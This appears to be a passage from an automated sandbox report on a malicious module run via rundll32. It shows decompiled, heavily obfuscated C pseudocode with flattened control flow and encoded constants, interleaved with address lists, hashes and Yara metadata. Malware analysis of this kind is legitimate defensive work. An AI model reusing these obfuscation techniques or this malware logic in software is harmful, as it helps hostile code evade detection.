									E006847CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
									_t268 = E0068A8B0(_v1068, _t269, _v1148);
									_t314 =  &(_t314[9]);
									_t310 = 0x5b9c87d;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1080);
					_push( &_v1040);
					_push(_v1124);
					E006A13AD(_v1072,  &_v520, __eflags);
					_t314 =  &(_t314[3]);
					_t310 = 0xafb2886;
					L9:
					__eflags = _t310 - 0xafb2886;
				} while (__eflags != 0);
				return _t268;
			}


















































                                                                                                                      0x006966ca
                                                                                                                      0x006966d0
                                                                                                                      0x006966d7
                                                                                                                      0x006966df
                                                                                                                      0x006966e7
                                                                                                                      0x006966ef
                                                                                                                      0x006966f7
                                                                                                                      0x006966ff
                                                                                                                      0x00696711
                                                                                                                      0x00696716
                                                                                                                      0x0069671c
                                                                                                                      0x00696724
                                                                                                                      0x00696729
                                                                                                                      0x00696731
                                                                                                                      0x00696736
                                                                                                                      0x0069673e
                                                                                                                      0x0069674b
                                                                                                                      0x0069674c
                                                                                                                      0x00696750
                                                                                                                      0x00696758
                                                                                                                      0x00696760
                                                                                                                      0x00696768
                                                                                                                      0x00696770
                                                                                                                      0x00696778
                                                                                                                      0x00696780
                                                                                                                      0x00696788
                                                                                                                      0x00696790
                                                                                                                      0x00696798
                                                                                                                      0x006967a0
                                                                                                                      0x006967a8
                                                                                                                      0x006967b0
                                                                                                                      0x006967b8
                                                                                                                      0x006967c0
                                                                                                                      0x006967c8
                                                                                                                      0x006967d0
                                                                                                                      0x006967d8
                                                                                                                      0x006967e0
                                                                                                                      0x006967e8
                                                                                                                      0x006967ed
                                                                                                                      0x006967f2
                                                                                                                      0x006967f7
                                                                                                                      0x006967ff
                                                                                                                      0x00696807
                                                                                                                      0x0069680f
                                                                                                                      0x00696814
                                                                                                                      0x0069681c
                                                                                                                      0x00696824
                                                                                                                      0x0069682c
                                                                                                                      0x00696834
                                                                                                                      0x0069683c
                                                                                                                      0x00696844
                                                                                                                      0x00696851
                                                                                                                      0x00696855
                                                                                                                      0x0069685a
                                                                                                                      0x00696862
                                                                                                                      0x0069686a
                                                                                                                      0x00696872
                                                                                                                      0x0069687a
                                                                                                                      0x00696888
                                                                                                                      0x0069688c
                                                                                                                      0x00696894
                                                                                                                      0x0069689c
                                                                                                                      0x006968a4
                                                                                                                      0x006968ac
                                                                                                                      0x006968b4
                                                                                                                      0x006968bc
                                                                                                                      0x006968c4
                                                                                                                      0x006968c9
                                                                                                                      0x006968ce
                                                                                                                      0x006968d8
                                                                                                                      0x006968e0
                                                                                                                      0x006968e8
                                                                                                                      0x006968ed
                                                                                                                      0x006968f2
                                                                                                                      0x006968fa
                                                                                                                      0x00696902
                                                                                                                      0x0069690a
                                                                                                                      0x00696912
                                                                                                                      0x0069691a
                                                                                                                      0x00696922
                                                                                                                      0x0069692a
                                                                                                                      0x00696932
                                                                                                                      0x0069693a
                                                                                                                      0x00696942
                                                                                                                      0x0069694a
                                                                                                                      0x00696952
                                                                                                                      0x0069695a
                                                                                                                      0x00696962
                                                                                                                      0x00696967
                                                                                                                      0x0069696f
                                                                                                                      0x00696977
                                                                                                                      0x00696986
                                                                                                                      0x00696989
                                                                                                                      0x0069698d
                                                                                                                      0x00696995
                                                                                                                      0x0069699d
                                                                                                                      0x006969a5
                                                                                                                      0x006969ad
                                                                                                                      0x006969b5
                                                                                                                      0x006969ba
                                                                                                                      0x006969bf
                                                                                                                      0x006969c7
                                                                                                                      0x006969d7
                                                                                                                      0x006969db
                                                                                                                      0x006969e3
                                                                                                                      0x006969eb
                                                                                                                      0x006969f3
                                                                                                                      0x006969fb
                                                                                                                      0x00696a08
                                                                                                                      0x00696a09
                                                                                                                      0x00696a0d
                                                                                                                      0x00696a15
                                                                                                                      0x00696a22
                                                                                                                      0x00696a26
                                                                                                                      0x00696a2e
                                                                                                                      0x00696a36
                                                                                                                      0x00696a3e
                                                                                                                      0x00696a4c
                                                                                                                      0x00696a50
                                                                                                                      0x00696a60
                                                                                                                      0x00696a74
                                                                                                                      0x00696a74
                                                                                                                      0x00696a82
                                                                                                                      0x00696b0d
                                                                                                                      0x00696b16
                                                                                                                      0x00696b1e
                                                                                                                      0x00696b2f
                                                                                                                      0x00696b34
                                                                                                                      0x00696b47
                                                                                                                      0x00696b6a
                                                                                                                      0x00696b7c
                                                                                                                      0x00696b81
                                                                                                                      0x00696b84
                                                                                                                      0x00000000
                                                                                                                      0x00696a88
                                                                                                                      0x00696a8e
                                                                                                                      0x00696b06
                                                                                                                      0x00000000
                                                                                                                      0x00696a90
                                                                                                                      0x00696a90
                                                                                                                      0x00696a92
                                                                                                                      0x00696a98
                                                                                                                      0x00696aa1
                                                                                                                      0x00696aa9
                                                                                                                      0x00696aba
                                                                                                                      0x00696ad2
                                                                                                                      0x00696ae5
                                                                                                                      0x00696af7
                                                                                                                      0x00696afc
                                                                                                                      0x00696aff
                                                                                                                      0x00000000
                                                                                                                      0x00696aff
                                                                                                                      0x00696a92
                                                                                                                      0x00696a8e
                                                                                                                      0x00000000
                                                                                                                      0x00696a82
                                                                                                                      0x00696b8e
                                                                                                                      0x00696b99
                                                                                                                      0x00696b9a
                                                                                                                      0x00696ba9
                                                                                                                      0x00696bae
                                                                                                                      0x00696bb1
                                                                                                                      0x00696bb3
                                                                                                                      0x00696bb3
                                                                                                                      0x00696bb3
                                                                                                                      0x00696bc5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <E$?c3$Md$a@$yw
                                                                                                                      • API String ID: 0-2084988834
                                                                                                                      • Opcode ID: cd731207f48e59872e4e3bf1d1c9981d8be4f2931cf5f5d6bfc18411d4346a9e
                                                                                                                      • Instruction ID: 755dc892a99b41bb1529c73ec859c4ecc60e569683546be63e848551b58ceccd
                                                                                                                      • Opcode Fuzzy Hash: cd731207f48e59872e4e3bf1d1c9981d8be4f2931cf5f5d6bfc18411d4346a9e
                                                                                                                      • Instruction Fuzzy Hash: 26C130724083809FD768DF25C58A81BBBF2FB94758F108A1DF5A696260D3B58A09CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00690001 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00690001(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t154;
				void* _t174;
				char _t178;
				void* _t183;
				char* _t189;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int* _t220;

				_push(_a4);
				_t209 = __edx;
				_push(__edx);
				_push(__ecx);
				E006920B9(_t154);
				_v132 = _v132 & 0x00000000;
				_t220 =  &(( &_v204)[3]);
				_v140 = 0x6f537b;
				_v136 = 0x2895cf;
				_t183 = 0xf669bfa;
				_v164 = 0xc3509d;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 ^ 0x0007728b;
				_v188 = 0x58efa0;
				_v188 = _v188 + 0xffff9444;
				_t210 = 0x2f;
				_v188 = _v188 / _t210;
				_v188 = _v188 ^ 0x000ac4b2;
				_v176 = 0xa783cc;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x73295065;
				_v176 = _v176 ^ 0xed239367;
				_v148 = 0x42262a;
				_v148 = _v148 | 0x228e56d6;
				_v148 = _v148 ^ 0x22cd87d0;
				_v204 = 0xc47428;
				_v204 = _v204 + 0xffff2e33;
				_v204 = _v204 + 0xffff2fa2;
				_v204 = _v204 + 0xffff28a7;
				_v204 = _v204 ^ 0x00c63754;
				_v156 = 0x11bd56;
				_t211 = 0x5c;
				_v156 = _v156 * 0x6a;
				_v156 = _v156 ^ 0x0752342f;
				_v172 = 0x489beb;
				_v172 = _v172 + 0xfe21;
				_v172 = _v172 / _t211;
				_v172 = _v172 ^ 0x0000a4d4;
				_v192 = 0x2e5859;
				_v192 = _v192 ^ 0x83ba67d9;
				_t212 = 0x44;
				_v192 = _v192 / _t212;
				_v192 = _v192 ^ 0x01e00d99;
				_v180 = 0x89bc6d;
				_v180 = _v180 | 0xb1d25d45;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xff5cc309;
				_v168 = 0x19805c;
				_t213 = 0x18;
				_v168 = _v168 * 0x16;
				_v168 = _v168 ^ 0x4d2845a5;
				_v168 = _v168 ^ 0x4f1adce1;
				_v196 = 0x9cfdcd;
				_v196 = _v196 / _t213;
				_v196 = _v196 + 0xd8a6;
				_v196 = _v196 ^ 0x0005e56c;
				_v200 = 0x1d77da;
				_t214 = 0x6b;
				_v200 = _v200 / _t214;
				_t215 = 9;
				_v200 = _v200 / _t215;
				_t216 = 0x59;
				_v200 = _v200 / _t216;
				_v200 = _v200 ^ 0x00052bad;
				_v184 = 0x474669;
				_v184 = _v184 * 0x25;
				_v184 = _v184 + 0xffff8141;
				_v184 = _v184 ^ 0x0a4cf000;
				_v160 = 0x98ddfb;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0x04cf55b1;
				_v152 = 0xbbc225;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x408ec409;
				while(_t183 != 0x4a2a3c4) {
					if(_t183 == 0x640e5f9) {
						__eflags = _v128;
						_t189 =  &_v128;
						while(__eflags != 0) {
							_t178 =  *_t189;
							__eflags = _t178 - 0x30;
							if(_t178 < 0x30) {
								L10:
								__eflags = _t178 - 0x61;
								if(_t178 < 0x61) {
									L12:
									__eflags = _t178 - 0x41;
									if(_t178 < 0x41) {
										L14:
										 *_t189 = 0x58;
									} else {
										__eflags = _t178 - 0x5a;
										if(_t178 > 0x5a) {
											goto L14;
										}
									}
								} else {
									__eflags = _t178 - 0x7a;
									if(_t178 > 0x7a) {
										goto L12;
									}
								}
							} else {
								__eflags = _t178 - 0x39;
								if(_t178 > 0x39) {
									goto L10;
								}
							}
							_t189 = _t189 + 1;
							__eflags =  *_t189;
						}
						_t183 = 0x4a2a3c4;
						continue;
					} else {
						if(_t183 == 0x7562914) {
							_v144 = 0x80;
							_t178 = E0068CD29(_v164,  &_v144, _v176,  &_v128);
							_t220 =  &(_t220[3]);
							_t183 = 0x640e5f9;
							continue;
						} else {
							if(_t183 == 0xf669bfa) {
								_t183 = 0x7562914;
								continue;
							}
						}
					}
					L18:
					__eflags = _t183 - 0x1718ff4;
					if(__eflags != 0) {
						continue;
					}
					return _t178;
				}
				_push(_v172);
				_push(_v156);
				_push(_v204);
				_t174 = E00698606(_v148, 0x681690, __eflags);
				E00682206( &_v128, _t209, _v196, _v200, _t174, E0068EE81(__eflags), _v184);
				_t178 = E0068A8B0(_v160, _t174, _v152);
				_t220 =  &(_t220[0xb]);
				_t183 = 0x1718ff4;
				goto L18;
			}





































                                                                                                                      0x0069000b
                                                                                                                      0x00690012
                                                                                                                      0x00690014
                                                                                                                      0x00690015
                                                                                                                      0x00690016
                                                                                                                      0x0069001b
                                                                                                                      0x00690020
                                                                                                                      0x00690023
                                                                                                                      0x0069002d
                                                                                                                      0x00690035
                                                                                                                      0x0069003a
                                                                                                                      0x00690042
                                                                                                                      0x00690047
                                                                                                                      0x0069004f
                                                                                                                      0x00690057
                                                                                                                      0x00690065
                                                                                                                      0x0069006a
                                                                                                                      0x00690070
                                                                                                                      0x00690078
                                                                                                                      0x00690080
                                                                                                                      0x00690085
                                                                                                                      0x0069008d
                                                                                                                      0x00690095
                                                                                                                      0x0069009d
                                                                                                                      0x006900a5
                                                                                                                      0x006900ad
                                                                                                                      0x006900b5
                                                                                                                      0x006900bd
                                                                                                                      0x006900c5
                                                                                                                      0x006900cd
                                                                                                                      0x006900d5
                                                                                                                      0x006900e2
                                                                                                                      0x006900e5
                                                                                                                      0x006900e9
                                                                                                                      0x006900f1
                                                                                                                      0x006900f9
                                                                                                                      0x00690109
                                                                                                                      0x0069010d
                                                                                                                      0x00690115
                                                                                                                      0x0069011d
                                                                                                                      0x00690129
                                                                                                                      0x0069012e
                                                                                                                      0x00690134
                                                                                                                      0x0069013c
                                                                                                                      0x00690144
                                                                                                                      0x0069014c
                                                                                                                      0x00690151
                                                                                                                      0x00690159
                                                                                                                      0x00690166
                                                                                                                      0x00690167
                                                                                                                      0x0069016b
                                                                                                                      0x00690173
                                                                                                                      0x0069017b
                                                                                                                      0x00690189
                                                                                                                      0x0069018d
                                                                                                                      0x00690195
                                                                                                                      0x0069019f
                                                                                                                      0x006901ad
                                                                                                                      0x006901b2
                                                                                                                      0x006901c1
                                                                                                                      0x006901c6
                                                                                                                      0x006901d5
                                                                                                                      0x006901d8
                                                                                                                      0x006901dc
                                                                                                                      0x006901e4
                                                                                                                      0x006901f1
                                                                                                                      0x006901f5
                                                                                                                      0x006901fd
                                                                                                                      0x00690205
                                                                                                                      0x0069020d
                                                                                                                      0x00690212
                                                                                                                      0x0069021a
                                                                                                                      0x00690227
                                                                                                                      0x0069022b
                                                                                                                      0x00690233
                                                                                                                      0x0069023d
                                                                                                                      0x00690280
                                                                                                                      0x00690285
                                                                                                                      0x00690289
                                                                                                                      0x0069028b
                                                                                                                      0x0069028d
                                                                                                                      0x0069028f
                                                                                                                      0x00690295
                                                                                                                      0x00690295
                                                                                                                      0x00690297
                                                                                                                      0x0069029d
                                                                                                                      0x0069029d
                                                                                                                      0x0069029f
                                                                                                                      0x006902a5
                                                                                                                      0x006902a5
                                                                                                                      0x006902a1
                                                                                                                      0x006902a1
                                                                                                                      0x006902a3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006902a3
                                                                                                                      0x00690299
                                                                                                                      0x00690299
                                                                                                                      0x0069029b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069029b
                                                                                                                      0x00690291
                                                                                                                      0x00690291
                                                                                                                      0x00690293
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00690293
                                                                                                                      0x006902a8
                                                                                                                      0x006902a9
                                                                                                                      0x006902a9
                                                                                                                      0x006902ae
                                                                                                                      0x00000000
                                                                                                                      0x0069023f
                                                                                                                      0x00690241
                                                                                                                      0x00690257
                                                                                                                      0x00690271
                                                                                                                      0x00690276
                                                                                                                      0x00690279
                                                                                                                      0x00000000
                                                                                                                      0x00690243
                                                                                                                      0x00690249
                                                                                                                      0x0069024f
                                                                                                                      0x00000000
                                                                                                                      0x0069024f
                                                                                                                      0x00690249
                                                                                                                      0x00690241
                                                                                                                      0x0069030f
                                                                                                                      0x0069030f
                                                                                                                      0x00690315
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00690325
                                                                                                                      0x00690325
                                                                                                                      0x006902b2
                                                                                                                      0x006902bb
                                                                                                                      0x006902bf
                                                                                                                      0x006902c7
                                                                                                                      0x006902f3
                                                                                                                      0x00690302
                                                                                                                      0x00690307
                                                                                                                      0x0069030a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                      • API String ID: 0-3810143839
                                                                                                                      • Opcode ID: fc93487f58cb5629a84373729fe90670aff1b3859adcda8fe4f62a981c416fb3
                                                                                                                      • Instruction ID: 4dab2f15be812e6386fa4c4bdcb6ba9748ce3e556d518ae05f530539e97460ac
                                                                                                                      • Opcode Fuzzy Hash: fc93487f58cb5629a84373729fe90670aff1b3859adcda8fe4f62a981c416fb3
                                                                                                                      • Instruction Fuzzy Hash: 9381A8715093419FD794CF25D588A5BBBE2BBC5B18F00591DF18586260D3B4CA4ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00687735 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00687735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ecx;
				void* _t163;
				signed int _t176;
				void* _t188;
				signed int _t205;
				signed int* _t207;
				void* _t209;
				void* _t210;

				_t186 = _a4;
				_t207 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t207);
				_push(_a4);
				_push(__edx);
				E006920B9(_t163);
				_v60 = 0x524796;
				_t210 = _t209 + 0x18;
				asm("stosd");
				_t188 = 0x9c25eae;
				asm("stosd");
				asm("stosd");
				_v76 = 0x29f01;
				_v76 = _v76 | 0x94be009d;
				_v76 = _v76 ^ 0x94be9f9d;
				_v108 = 0xafa956;
				_v108 = _v108 + 0x628;
				_v108 = _v108 ^ 0xf539d3de;
				_v108 = _v108 ^ 0xf5927b2e;
				_v92 = 0x300c11;
				_v92 = _v92 ^ 0x95f7d427;
				_v92 = _v92 ^ 0x95c19bc8;
				_v116 = 0x7fd72e;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 + 0x5d9b;
				_v116 = _v116 ^ 0x0001fda4;
				_v88 = 0x25a82f;
				_t205 = 0x1b;
				_v88 = _v88 * 0x72;
				_v88 = _v88 ^ 0x10cad58f;
				_v100 = 0xf91ce5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x71d91e41;
				_v100 = _v100 ^ 0x71d9c87d;
				_v136 = 0x5a524;
				_v136 = _v136 ^ 0x65d544fc;
				_v136 = _v136 / _t205;
				_v136 = _v136 + 0xdad4;
				_v136 = _v136 ^ 0x03c43220;
				_v68 = 0xd5537a;
				_v68 = _v68 + 0xffffd52f;
				_v68 = _v68 ^ 0x00d2b66c;
				_v128 = 0x59397b;
				_v128 = _v128 ^ 0x5dfc0cc3;
				_v128 = _v128 + 0x56f6;
				_v128 = _v128 + 0xff83;
				_v128 = _v128 ^ 0x5dafd3d4;
				_v104 = 0x85edfa;
				_v104 = _v104 | 0x32b3baf7;
				_v104 = _v104 ^ 0x32b12396;
				_v112 = 0x4c4fc6;
				_v112 = _v112 + 0xbf9f;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x002f2047;
				_v120 = 0xc21a43;
				_v120 = _v120 | 0x0781619f;
				_v120 = _v120 ^ 0x30a197e6;
				_v120 = _v120 ^ 0x376a3e6d;
				_v84 = 0xaf6a80;
				_v84 = _v84 + 0xffff12f3;
				_v84 = _v84 ^ 0x00ae6f5f;
				_v64 = 0x7bdfb0;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x00114c08;
				_v96 = 0x6b35de;
				_v96 = _v96 * 0x60;
				_v96 = _v96 ^ 0x283b6418;
				_v124 = 0x52b9d2;
				_v124 = _v124 | 0x40c5122c;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0001910d;
				_v132 = 0x44d0f9;
				_v132 = _v132 * 0x29;
				_v132 = _v132 + 0xf17;
				_v132 = _v132 * 0x65;
				_v132 = _v132 ^ 0x592f3fb2;
				_v72 = 0xc75ad6;
				_v72 = _v72 ^ 0xe0bef3a1;
				_v72 = _v72 ^ 0xe072572c;
				_v80 = 0xa6c1d6;
				_v80 = _v80 + 0xc8d;
				_v80 = _v80 ^ 0x00ac29a9;
				do {
					while(_t188 != 0xe27b71) {
						if(_t188 == 0x372e88b) {
							_push(_t188);
							_push(_t188);
							_t176 = E00687FF2(_t207[1]);
							 *_t207 = _t176;
							__eflags = _t176;
							if(__eflags != 0) {
								_t188 = 0xe27b71;
								continue;
							}
						} else {
							if(_t188 == 0x93f98fe) {
								_t207[1] = E006A0C14(_t186);
								_t188 = 0x372e88b;
								continue;
							} else {
								if(_t188 == 0x9c25eae) {
									_t188 = 0x93f98fe;
									 *_t207 =  *_t207 & 0x00000000;
									_t207[1] = _v76;
									continue;
								} else {
									if(_t188 == 0xa0c9f29) {
										_t146 =  &_v112; // 0x2f2047
										E00690DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
										_t210 = _t210 + 0x10;
										_t188 = 0xc7f60b3;
										continue;
									} else {
										if(_t188 == 0xc7f60b3) {
											_t144 =  &_v84; // 0xe072572c
											E006A0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
											_t210 = _t210 + 0x10;
											_t188 = 0xcf8cba1;
											continue;
										} else {
											_t219 = _t188 - 0xcf8cba1;
											if(_t188 != 0xcf8cba1) {
												goto L17;
											} else {
												E006A0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t207 != 0x00000000;
					}
					E00683DBC( &_v44, _t207, _v88, _v100, _v136);
					_t210 = _t210 + 0xc;
					_t188 = 0xa0c9f29;
					L17:
					__eflags = _t188 - 0x560a718;
				} while (__eflags != 0);
				goto L9;
			}

































                                                                                                                      0x0068773c
                                                                                                                      0x00687745
                                                                                                                      0x0068774d
                                                                                                                      0x00687754
                                                                                                                      0x0068775b
                                                                                                                      0x0068775c
                                                                                                                      0x0068775d
                                                                                                                      0x0068775f
                                                                                                                      0x00687764
                                                                                                                      0x00687772
                                                                                                                      0x00687775
                                                                                                                      0x00687778
                                                                                                                      0x0068777f
                                                                                                                      0x00687780
                                                                                                                      0x00687781
                                                                                                                      0x00687789
                                                                                                                      0x00687791
                                                                                                                      0x00687799
                                                                                                                      0x006877a1
                                                                                                                      0x006877a9
                                                                                                                      0x006877b1
                                                                                                                      0x006877b9
                                                                                                                      0x006877c1
                                                                                                                      0x006877c9
                                                                                                                      0x006877d1
                                                                                                                      0x006877d9
                                                                                                                      0x006877de
                                                                                                                      0x006877e6
                                                                                                                      0x006877ee
                                                                                                                      0x006877fb
                                                                                                                      0x006877fc
                                                                                                                      0x00687800
                                                                                                                      0x00687808
                                                                                                                      0x00687810
                                                                                                                      0x00687815
                                                                                                                      0x0068781d
                                                                                                                      0x00687825
                                                                                                                      0x0068782d
                                                                                                                      0x0068783b
                                                                                                                      0x0068783f
                                                                                                                      0x00687847
                                                                                                                      0x0068784f
                                                                                                                      0x00687857
                                                                                                                      0x0068785f
                                                                                                                      0x00687867
                                                                                                                      0x0068786f
                                                                                                                      0x00687877
                                                                                                                      0x0068787f
                                                                                                                      0x00687887
                                                                                                                      0x0068788f
                                                                                                                      0x00687897
                                                                                                                      0x0068789f
                                                                                                                      0x006878a7
                                                                                                                      0x006878af
                                                                                                                      0x006878b7
                                                                                                                      0x006878bb
                                                                                                                      0x006878c3
                                                                                                                      0x006878cb
                                                                                                                      0x006878d3
                                                                                                                      0x006878db
                                                                                                                      0x006878e3
                                                                                                                      0x006878eb
                                                                                                                      0x006878f3
                                                                                                                      0x006878fb
                                                                                                                      0x00687903
                                                                                                                      0x00687908
                                                                                                                      0x00687910
                                                                                                                      0x0068791d
                                                                                                                      0x00687921
                                                                                                                      0x0068792e
                                                                                                                      0x0068793b
                                                                                                                      0x00687943
                                                                                                                      0x00687948
                                                                                                                      0x0068794d
                                                                                                                      0x00687955
                                                                                                                      0x00687962
                                                                                                                      0x00687966
                                                                                                                      0x00687973
                                                                                                                      0x00687977
                                                                                                                      0x0068797f
                                                                                                                      0x00687987
                                                                                                                      0x0068798f
                                                                                                                      0x00687997
                                                                                                                      0x0068799f
                                                                                                                      0x006879a7
                                                                                                                      0x006879af
                                                                                                                      0x006879af
                                                                                                                      0x006879bd
                                                                                                                      0x00687aac
                                                                                                                      0x00687aad
                                                                                                                      0x00687aae
                                                                                                                      0x00687ab3
                                                                                                                      0x00687ab7
                                                                                                                      0x00687ab9
                                                                                                                      0x00687abf
                                                                                                                      0x00000000
                                                                                                                      0x00687abf
                                                                                                                      0x006879c3
                                                                                                                      0x006879c5
                                                                                                                      0x00687a90
                                                                                                                      0x00687a93
                                                                                                                      0x00000000
                                                                                                                      0x006879cb
                                                                                                                      0x006879d1
                                                                                                                      0x00687a7c
                                                                                                                      0x00687a7e
                                                                                                                      0x00687a81
                                                                                                                      0x00000000
                                                                                                                      0x006879d7
                                                                                                                      0x006879dd
                                                                                                                      0x00687a4f
                                                                                                                      0x00687a66
                                                                                                                      0x00687a6b
                                                                                                                      0x00687a6e
                                                                                                                      0x00000000
                                                                                                                      0x006879df
                                                                                                                      0x006879e5
                                                                                                                      0x00687a35
                                                                                                                      0x00687a3d
                                                                                                                      0x00687a42
                                                                                                                      0x00687a45
                                                                                                                      0x00000000
                                                                                                                      0x006879e7
                                                                                                                      0x006879e7
                                                                                                                      0x006879ed
                                                                                                                      0x00000000
                                                                                                                      0x006879f3
                                                                                                                      0x00687a0b
                                                                                                                      0x00687a10
                                                                                                                      0x006879ed
                                                                                                                      0x006879e5
                                                                                                                      0x006879dd
                                                                                                                      0x006879d1
                                                                                                                      0x006879c5
                                                                                                                      0x00687a13
                                                                                                                      0x00687a24
                                                                                                                      0x00687a24
                                                                                                                      0x00687ad8
                                                                                                                      0x00687add
                                                                                                                      0x00687ae0
                                                                                                                      0x00687ae5
                                                                                                                      0x00687ae5
                                                                                                                      0x00687ae5
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                      • API String ID: 0-2956538602
                                                                                                                      • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                      • Instruction ID: fa89491163c855f638f5ceaa2b84626705cebbd25d0d47cf6c6184ca813450a1
                                                                                                                      • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                      • Instruction Fuzzy Hash: A4913E710093419FD7A8DF65D58692BBBE2FBC4748F209A1CF29296220D3B5CA498F43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00684816 Relevance: 6.4, Strings: 5, Instructions: 180COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00684816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t164;
				void* _t179;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t196;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a16);
				_t213 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t164);
				_v4 = _v4 & 0x00000000;
				_t217 =  &(( &_v88)[6]);
				_v16 = 0xc0a747;
				_v12 = 0xade381;
				_t214 = 0;
				_v8 = 0x11050f;
				_t196 = 0x5adc597;
				_v84 = 0xdf9e69;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff5795;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x0001b9f8;
				_v68 = 0xf2d8cd;
				_v68 = _v68 << 6;
